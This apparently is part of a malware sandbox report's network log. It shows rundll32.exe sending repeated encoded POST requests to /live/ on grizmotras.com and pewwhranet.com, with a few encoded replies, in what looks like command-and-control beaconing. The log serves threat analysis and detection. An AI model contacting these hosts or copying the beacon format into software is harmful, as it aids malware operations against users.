                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                68 | 192.168.2.5 | 49791 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:51 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:51 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                69 | 192.168.2.5 | 49792 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:55 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:55 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 49793 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:20:59 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 49794 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:04 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 49795 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:08 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 49796 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:12 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.5 | 49797 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:16 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
2024-04-26 21:21:20 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:21:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71uYoDhVQM%2FCUpvgGXIIrLnoubWt%2FoYOcbqImOqMF8rsQtOKP3GE%2BO2nj5ETrTxGCMjm666Cp%2BYNhAp75MMvURN%2Bp7B8IzZddXA7EU4YBDfHS%2F1kbyMQk9vv7Wx0YshT3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99f220ee47441-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.5 | 49798 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:20 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 49799 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:24 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.5 | 49800 | 172.67.219.28 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:29 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.5 | 49801 | 104.21.84.207 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:33 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.5 | 49802 | 172.67.219.28 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:37 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
2024-04-26 21:21:41 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:21:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UlP1UiPxwBFkOn%2F1PYQj6UyPfHIPLhNSk%2FA7swH64WCQL%2FieEACkCB%2ByUHNgqByoRbbr5bWB9PyvdSdpvd7ei8V8zVVBxIGmcV3PPsq3%2FtGH11DhSFnwcqV68Itfp25N%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99fa439202588-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.5 | 49803 | 172.67.219.28 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:42 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                Data Ascii: YjOeEyiMk3RoA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.5 | 49804 | 104.21.84.207 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:21:46 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:46 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                82 | 192.168.2.5 | 49805 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:21:50 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:50 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                83 | 192.168.2.5 | 49806 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:21:55 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:55 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                84 | 192.168.2.5 | 49807 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:21:59 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:59 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                85 | 192.168.2.5 | 49808 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:03 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:03 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                86 | 192.168.2.5 | 49809 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:08 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:08 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                87 | 192.168.2.5 | 49810 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:12 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:12 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                88 | 192.168.2.5 | 49811 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:16 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:16 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                89 | 192.168.2.5 | 49812 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:20 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:20 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                90 | 192.168.2.5 | 49813 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:25 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:25 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                91 | 192.168.2.5 | 49814 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:29 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:29 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                92 | 192.168.2.5 | 49815 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:33 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:33 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                93 | 192.168.2.5 | 49816 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:37 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:37 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                94 | 192.168.2.5 | 49817 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:42 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:22:42 UTC | 180 | OUT | (request body)


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                95 | 192.168.2.5 | 49818 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:46 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                96 | 192.168.2.5 | 49819 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:50 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                97 | 192.168.2.5 | 49820 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:55 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                98 | 192.168.2.5 | 49821 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:22:59 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                99 | 192.168.2.5 | 49822 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:03 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                100 | 192.168.2.5 | 49823 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:07 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:11 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bG0yyh%2FF9bYUy90bVP9XYKsYe59iDg5lEEUFfTVgkGy6lbfHHcYd8LEGulzgU2Y%2Futy%2BHwXoBtnDWLJ96%2FhjJMPtdzCgHe9lRTI3wDiMBuDGzcNALznpJcd%2FARziadCIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a1d81d36b3b6-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                101 | 192.168.2.5 | 49824 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:12 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:16 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
